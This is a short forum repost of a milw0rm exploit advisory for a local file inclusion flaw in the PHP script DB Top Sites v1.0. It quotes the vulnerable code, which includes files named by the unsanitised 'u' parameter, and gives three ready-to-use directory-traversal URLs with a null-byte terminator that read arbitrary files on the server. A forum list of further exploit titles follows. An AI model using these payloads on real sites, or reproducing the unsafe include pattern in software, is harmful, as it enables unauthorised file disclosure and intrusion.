- Code:
######################################################################
[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
#######################################################################
[+] Local File Inclusion
- Vulnerable code is everywhere
-------------------------------------------------------------------------------------------------------
if ( $u != "" ) {
if ( file_exists( "./sites/session/$u.session.php" ) ){
include "./sites/session/$u.session.php";
include "./sites/$u.php";
-------------------------------------------------------------------------------------------------------
- PoC's
http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00
http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00
http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00
#######################################################################
# milw0rm.com [2009-06-15]
DB Top Sites 1.0 (index.php u) Local File Inclusion Vulnerability
Foxi- Admin
- Posts : 92
Reputation : -1
Join date : 2009-07-08
» Meta Search Engine Script (url) Local File Disclosure Vulnerability
» Super Simple Blog Script 2.5.4 Local File Inclusion Vulnerability
» Basilic 1.5.13 (index.php idAuthor) SQL Injection Vulnerability
» AWCM 2.1 Local File Inclusion / Auth Bypass Vulnerabilities
» Mundi Mail 0.8.2 (top) Remote File Inclusion Vulnerability
» Super Simple Blog Script 2.5.4 Local File Inclusion Vulnerability
» Basilic 1.5.13 (index.php idAuthor) SQL Injection Vulnerability
» AWCM 2.1 Local File Inclusion / Auth Bypass Vulnerabilities
» Mundi Mail 0.8.2 (top) Remote File Inclusion Vulnerability